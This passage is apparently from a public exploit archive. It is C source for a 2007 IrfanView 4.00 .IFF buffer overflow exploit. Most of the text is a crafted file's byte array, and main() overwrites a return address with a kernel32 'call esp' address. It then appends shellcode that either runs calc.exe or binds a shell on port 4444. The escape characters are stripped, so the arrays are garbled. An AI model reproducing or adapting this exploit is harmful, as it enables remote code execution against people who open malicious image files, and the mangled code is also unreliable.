"x80x01xc0x01x80x00x1ex00x3fx80x08xe5x00xe9x00x0b"
"x7fx00x03xe0x00xc0x00x0fx80xfex80x04xe5x00xebx00"
"x00x40xfex00x09x02x00x01x40x00x10x00x41x80x04xe5"
"x00xebx00x06x40x00x40x00x02x60x01xffx00x04x10x80"
"xe3x80x04xe5x00xc1x00xc1x00xc1x00xecxffx05xf9x3f"
"xfexfdxffxfbxfdxffx05xf7x7fxefx1fxffxebxe7xffx00"
"xf8xecx00x0fx05x80x01x78x00x03x00x01x80x00x03xc0"
"x17x80x00x20xe6x00xecx00x0fx03xc0x00xfex00x07x80"
"x00xc0x00x0fx80x0fxe0x00x3cxe6x00xe9x00x00x84xff"
"x00x06x80x01x40x00x04x40x08xffx00x00x28xe6x00xec"
"x00x00x01xffx00x00x0exfex00x00x01xffx00x05x08x40"
"x00x20x00x2cxe6x00xc1x00xc1x00xc1x00xe7xffx00xfe"
"xfdxffx03xfexcfxf8xf7xffxffx00x7fxe8xffx00xf8xec"
"x00x0fx0dx80x0fxf8x00x16x00x01x80x00x03xc0x01xe8"
"x00x0cxe6x00xecx00x05x1ex80x0bxe8x00x1fxffx00x08"
"xc0x00x01xf0x07xf0x00x1fx80xe7x00xecx00x0ax13x80"
"x0cx18x00x18x00x01x40x00x02xffx00x02x10x00x13xe6"
"x00xecx00x07x1dx80x0ex38x00x10x00x01xffx00x02x02"
"x10x04xffx00x01x1dx80xe7x00xc1x00xc1x00xc1x00xec"
"xffx05xebxffxc7xbfxffxdfxfdxffx06xfexefxffxfexff"
"xfbx7fxe8xffx00xf8xecx00x08x08x00x0fx40x00x1cx00"
"x01x80xffx00x05x78x01xfcx00x01x80xe7x00xecx00x05"
"x14x00x3fx80x00x3exffx00x08xc0x00x01xf0x01x7fx00"
"x07xc0xe7x00xecx00x00x08xffx00x05x80x00x02x00x01"
"x40xffx00x05x88x01x82x00x02x40xe7x00xecx00x02x0c"
"x00x20xffx00x02x32x00x01xffx00x05x01x08x01xc7x00"
"x07xe6x00xc1x00xc1x00xc1x00xedxffx00xf7xffxffx00"
"x58xffxffx00xbbxfcxffx05xd9xffxdex3fxffx3fxe8xff"
"x00xf8xedx00x00x06xffx00x00xbcxffx00x03x7cx00x01"
"x80xffx00x02x78x00x2fxffx00x00x40xe7x00xedx00x00"
"x0axffx00x00x7fxffx00x00x38xffx00x00xc0xffx00x05"
"x3ex00x1fxc0x00x80xe7x00xedx00x00x06xffx00x00x40"
"xfdx00x01x01x40xffx00x02x40x00x10xe4x00xedx00x00"
"x0exffx00x00x01xffx00x02x20x00x01xfex00x00x42xff"
"x00x02x40x00x80xe7x00xc1x00xc1x00xc1x00xedxffx00"
"xf7xfcxffx00x27xfcxffx06xddxffxf3xefxffxfdx3fxe9"
"xffx00xf8xedx00x03x6ax00x02xf4xffx00x03xf8x00x01"
"x80xffx00x06x0fx00x03xd0x00x01x40xe8x00xedx00x03"
"x5ex00x01xfcxffx00x00x70xffx00x00xc0xffx00x06x3e"
"x00x0fxe0x00x03x80xe8x00xedx00x03x76x00x03x0cxfd"
"x00x01x01x40xffx00x00x11xffx00x00x20xe5x00xedx00"
"x03x62x00x02x1cxfdx00x00x01xfex00x02x21x00x0axff"
"x00x00x03xe7x00xc1x00xc1x00xc1x00xeexffx04xfexa7"
"xffxefxdfxffxffx00xefxfcxffx03xfbxbfxffxfdxffxff"
"x00xe7xe9xffx00xf8xeex00x04x01x60x00x07xa0xffx00"
"x03xe0x00x01x80xffx00x06x0fx00x03xf8x00x01x68xe8"
"x00xedx00x06xf8x00x1fxc0x00x01xf0xffx00x00xc0xff"
"x00x03x07xc0x02xfexffx00x00xf0xe8x00xedx00x05x80"
"x00x08x40x00x01xffx00x01x01x40xffx00x06x08x80x03"
"x04x00x01x80xe8x00xedx00x02x28x00x1cxffx00x03x01"
"x30x00x01xfex00x06x08x40x03x8ex00x01x60xe8x00xc1"
"x00xc1x00xc1x00xeexffx06xfex3fxffx8cx7fxffxfdxfb"
"xffx06xfbxbfxffxbcx7fxffxdbxe9xffx00xf8xedx00x02"
"x40x00x5exffx00x04x01xa0x00x01x80xffx00x06x01xe0"
"x00x5ex80x00x68xe8x00xeex00x07x01x80x00x3fx80x00"
"x03xe0xffx00x00xc0xffx00x03x07xc0x00x3fxffx00x00"
"x5cxe8x00xe7x00x03x60x00x01x40xffx00x03x02x20x00"
"x20xffx00x00x50xe8x00xeax00x00x80xffx00x02x20x00"
"x01xfex00x01x04x20xfdx00x00x48xe8x00xc1x00xc1x00"
"xc1x00xeexffx03xbfxffxfexfdxfexffx00x7fxfbxffx02"
"xf7xffxefxffxffx00xfbxe9xffx00xf8xeex00x03x60x00"
"x01x78xffx00x00x03xffx00x01x01x80xffx00x04x01xe0"
"x00x07xa0xffx00x00x10xe9x00xeex00x00x20xffx00x00"
"xfexffx00x01x07x80xffx00x00xc0xfex00x06xf8x00x1f"
"xc0x00x04x10xe9x00xeex00x00x20xffx00x00x84xffx00"
"x00x04xffx00x01x01x40xffx00x04x01x10x00x08x60xff"
"x00x00x10xe9x00xeex00x00x20xffx00x00x0exfcx00x00"
"x01xfex00x07x01x88x00x1cx20x00x04x10xe9x00xc1x00"
"xc1x00xc1x00xefxffx03xfcxdfxffxf7xfexffx00xefxfa"
"xffx00xb7xffxffx00xfbxffxffx00xddxeaxffx00xf8xee"
"x00x03xc0x00x03xd0xffx00x00x06xffx00x01x01x80xfe"
"x00x03xbcx00x02xf0xffx00x00x14xe9x00xefx00x04x03"
"xe0x00x0fxe0xffx00x00x1fxfex00x00xc0xfex00x03xf8"
"x00x01xfcxffx00x00x3axe9x00xecx00x01x04x30xffx00"
"x00x09xffx00x01x01x40xfex00x03x84x00x03x08xffx00"
"x00x0cxe9x00xefx00x04x02xe0x00x0ex10xffx00x00x11"
"xffx00x00x01xfdx00x03x84x00x02x1cxffx00x00x36xe9"
"x00xc1x00xc1x00xc1x00xefxffx04xefxbfxffxc7xbfxff"
"xffx00xdfxfaxffx00xdexffxffx00x18xffxffx01xe5xbf"
"xebxffx00xf8xefx00x04x06x80x00x0fx40xffx00x00x1e"
"xffx00x01x01x80xfex00x00x3cxffx00x00xbdxffx00x01"
"x06x80xeax00xefx00x04x1fx40x00x3fx80xffx00x00x3c"
"xfex00x00xc0xfex00x00x1fxffx00x00x7exffx00x01x1f"
"x40xeax00xefx00x01x09x80xffx00x00x80xffx00x00x02"
"xffx00x01x01x40xfex00x00x02xfcx00x01x01x80xeax00"
"xefx00x03x1exc0x00x20xfex00x00x32xffx00x00x01xfd"
"x00x00x11xfcx00x01x14xc0xeax00xc1x00xc1x00xc1x00"
"xefxffx00xfdxffxffx00x7exfexffx00x93xfaxffx00xf6"
"xffxffx00xdfxffxffx00xfdxeaxffx00xf8xefx00x00x0c"
"xffx00x00xbcxfex00x00x7cxffx00x01x01x80xfex00x04"
"x17x80x00x0fx60xffx00x00x80xeax00xefx00x00x1axff"
"x00x00x7fxfex00x00x38xfex00x00xc0xfex00x00x1fxff"
;

int main(int argc, char* argv[])
{
	FILE* ifffile;
	char evilbuff[10000];
	int offset=0;

	printf("[+] IrfanView <= 4.00 .IFF File Buffer Overflown");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
	if (argc!=3) {
		printf("[+] Usage: %s Mode <file.iff>n",argv[0]);
		printf("[+] Mode is 0 -> run calc.exen");
		printf("[+]         1 -> bind shell to port 4444n");
		return 0;
	}

	memcpy(evilbuff,iff_file_part1,sizeof(iff_file_part1)-1);
	offset=sizeof(iff_file_part1)-1;
	memcpy(evilbuff+offset,iff_file_part2,sizeof(iff_file_part2)-1);
	memcpy(evilbuff+offset,"x8bx51x81x7cx43x43x43x43",8); 		//call esp in kernel32

	if (!atoi(argv[1]))
		memcpy(evilbuff+offset+8,CalcShellcode,sizeof(CalcShellcode)-1);
	else
		memcpy(evilbuff+offset+8,BindShellcode,sizeof(BindShellcode)-1);
 
	printf("[+] iff_file_part2 patched!n");
	
	if ((ifffile=fopen(argv[2],"wb"))==0) {
		printf("[-] Unable to access file.n");
		return 0;
	}
	
	fwrite( evilbuff, 1, sizeof(iff_file_part2)+sizeof(iff_file_part1)-2, ifffile );
	fclose(ifffile);
	printf("[+] Done. Have fun!n");
	return 0;
	
}

// www.Syue.com [2007-04-27]